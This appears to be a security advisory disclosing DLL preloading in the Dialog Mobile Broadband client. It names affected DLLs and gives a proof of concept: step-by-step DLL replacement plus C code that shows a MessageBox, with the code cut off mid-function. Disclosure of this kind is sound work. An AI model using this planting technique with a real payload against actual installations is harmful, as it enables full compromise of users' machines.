DLL Preloading also called binary planting attacks, by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL, adversaries may execute their own malicious payloads. Often this location is the current working directory of the program. [1] as a result of successful attack adversaries may totally compromise the target. attack vector and successful attacks rely on many factors that beyond the control of the attacker, considering this point DLL preloading may not be a vulnerability, however for dialog mobile broadband client application this will be a different case.
Dialog mobile broadband is pre-installed application delivered with USB dongles. USB dongles used to access internet. a user can use dialog mobile broadband application to interact with the USB dongle to connect to the internet.
This application used by financial institutions and even banks for their connectivity, therefore the impact of DLL preloading is high. considering the use cases of this application it is better to mitigate these kind of risks.
Vulnerable Software Version : 23.015.11.01.297
Affected DLL's: CallSrvPlugin.dll, GpsSrvPlugin.dll, CallAppPlugin.dll, CallLogSrvPlugin.dll, WLANPlugin.dll and MDInterface.dll
PROOF OF CONCEPT.
1. Compile the following code as dynamic link library (DLL)
2. Rename to CallSrvPlugin.dll
3. Replace CallSrvPlugin in "C:\Program Files (x86)\Dialog Mobile Broadband"
4. Launch Dialog Mobile Broadband
5. MessageBox executes that verifies the dll hijacking is successful.
#include <windows.h>
int dll_hijack()
{
MessageBox(0, "DLL Preloading in dialog mobile broadband", "DLL Message", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
Timeline
Initial Report Sent to the Vendor : 10/9/2017
No response from vendor after reminders
Vendor site : https://www.dialog.lk